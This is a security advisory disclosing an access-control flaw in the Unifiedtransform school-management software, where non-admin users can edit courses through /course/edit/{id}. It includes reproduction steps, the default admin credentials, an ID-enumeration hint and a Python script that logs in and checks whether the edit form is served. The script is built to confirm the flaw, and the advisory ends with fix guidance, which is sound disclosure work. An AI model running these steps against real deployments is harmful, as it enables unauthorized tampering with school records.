## Description

Unifiedtransform v2.X is vulnerable to Incorrect Access Control (CWE-284). Any authenticated user, including students and teachers, can open and submit the course edit form at `/course/edit/{id}`, functionality that is intended exclusively for administrators. Exploiting this flaw allows unauthorized modification of course names and types, compromising data integrity and the administrative controls that depend on it.

Vendor: [Unifiedtransform](https://github.com/changeweb/Unifiedtransform)

## Product

Unifiedtransform, a school management software, v2.X

---

## Affected components

The access control mechanism responsible for course permissions:

- Route: `GET /course/edit/{id}`
- Controller: `CourseController`
- Method: `edit()`
- All other endpoints and functionality related to editing a course. The update request submitted by the edit form must be checked as well, since hiding the form in the UI alone does not fix the issue.

## PoC/Attack Vector

**Step 1:** Install the application as instructed in the official GitHub repository and log in using the default admin credentials (`admin@ut.com:password`).

**Step 2:** Create several courses to populate data.

**Step 3:** Log out and log in to the application as a Teacher or Student.

**Step 4:** Navigate to `/course/edit/{id}` for any existing course. Course IDs are sequential integers starting at 1, so if you created two courses, `ID=1` is the first course and `ID=2` the second; this also makes every course trivially enumerable.

**Step 5:** Change the course name and type and click Update. The change is saved even though the logged-in user is not an administrator.

---

**Vulnerability Type:** Incorrect Access Control

**Attack Type:** Remote

**Impact:** Escalation of Privileges

**Attack Vectors:** Broken access control allows an authenticated teacher or student to modify course data.

**Discoverer:** Sneh Bavarva

## Additional information

**Impact:** Unauthorized changes to course information can lead to academic mismanagement and a breakdown of the curriculum structure. Only administrators should have the authority to modify such data, and that restriction must be enforced server-side (in the controller or route middleware) rather than only by hiding the link in the interface.
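The steps above can be reproduced without a browser. The following script is an added example written for this advisory; it is not code from the Unifiedtransform project. It logs in as a given account and requests `/course/edit/{id}`, then classifies the response: a 200 that carries a form means the edit page was served to that user. It assumes a Laravel-style login form at `/login` with fields `_token`, `email` and `password` (an assumption; adjust to the installed instance) and that an enforced check answers with 403 or a redirect away from the form. Only the standard library is used, so `classify` and `extract_csrf` can be exercised offline with constructed responses.

```python
"""Probe whether /course/edit/{id} is served to a non-admin account.

Added example for this advisory, not Unifiedtransform code. Assumptions:
Laravel-style login form at /login with fields _token, email, password;
an enforced check answers the edit request with 403 or a redirect.
"""
import http.cookiejar
import re
import sys
import urllib.error
import urllib.parse
import urllib.request


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 3xx responses to the caller instead of following them."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def make_session():
    """Opener with a cookie jar so the login session persists across requests."""
    jar = http.cookiejar.CookieJar()
    return urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(jar), NoRedirect()
    )


def fetch(opener, url, data=None):
    """Return (status, headers, body); HTTP errors are returned, not raised."""
    req = urllib.request.Request(url, data=data, headers={"User-Agent": "ut-acl-probe"})
    try:
        with opener.open(req, timeout=15) as resp:
            return resp.status, dict(resp.headers), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, dict(err.headers), err.read().decode("utf-8", "replace")


# Laravel's @csrf directive renders: <input type="hidden" name="_token" value="...">
CSRF_RE = re.compile(r'name="_token"\s+value="([^"]+)"')


def extract_csrf(html):
    """Return the CSRF token embedded in a form, or None if absent."""
    match = CSRF_RE.search(html)
    return match.group(1) if match else None


def classify(status, headers, body, form_marker="<form"):
    """Map the edit-page response onto an access-control verdict.

    200 carrying a form -> "vulnerable" (edit form served to this user)
    403                 -> "enforced"
    3xx                 -> "redirected" (a bounce to the dashboard or
                           login page means the check held; inspect Location)
    anything else       -> "unknown" (inspect manually)
    """
    if status == 200 and form_marker in body:
        return "vulnerable"
    if status == 403:
        return "enforced"
    if status in (301, 302, 303, 307, 308):
        return "redirected"
    return "unknown"


def login(opener, base, email, password):
    """Authenticate through the login form (field names are an assumption)."""
    status, _, page = fetch(opener, base + "/login")
    token = extract_csrf(page)
    if status != 200 or token is None:
        raise RuntimeError("could not load login form or find its CSRF token")
    form = urllib.parse.urlencode(
        {"_token": token, "email": email, "password": password}
    ).encode()
    status, headers, _ = fetch(opener, base + "/login", data=form)
    # Laravel redirects after a successful login; a re-rendered form (200)
    # means the credentials were rejected.
    if status not in (301, 302, 303):
        raise RuntimeError(f"login as {email} failed (HTTP {status})")
    return headers.get("Location")


def probe(base, email, password, course_id):
    """Log in as the given user and request the course edit page."""
    opener = make_session()
    login(opener, base, email, password)
    status, headers, body = fetch(opener, f"{base}/course/edit/{course_id}")
    return classify(status, headers, body), status, headers.get("Location")


if __name__ == "__main__":
    if len(sys.argv) != 5:
        sys.exit("usage: probe.py BASE_URL EMAIL PASSWORD COURSE_ID")
    base_url, user, pw, cid = sys.argv[1:]
    verdict, code, location = probe(base_url.rstrip("/"), user, pw, cid)
    print(f"GET /course/edit/{cid} as {user}: HTTP {code} -> {verdict}"
          + (f" (Location: {location})" if location else ""))
```

Run it once with the admin account (a "vulnerable" verdict there is the legitimate behaviour and confirms the script is parsing the page correctly) and once with a teacher or student account. After a fix, also re-submit the form's update request as the low-privilege user, since a check applied only to `edit()` leaves the write path open.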
**References:**

- [Unifiedtransform GitHub Repository](https://github.com/changeweb/Unifiedtransform)
- [Unifiedtransform Official Site](http://unifiedtransform.com)
- [CWE-284: Improper Access Control](https://cwe.mitre.org/data/definitions/284.html)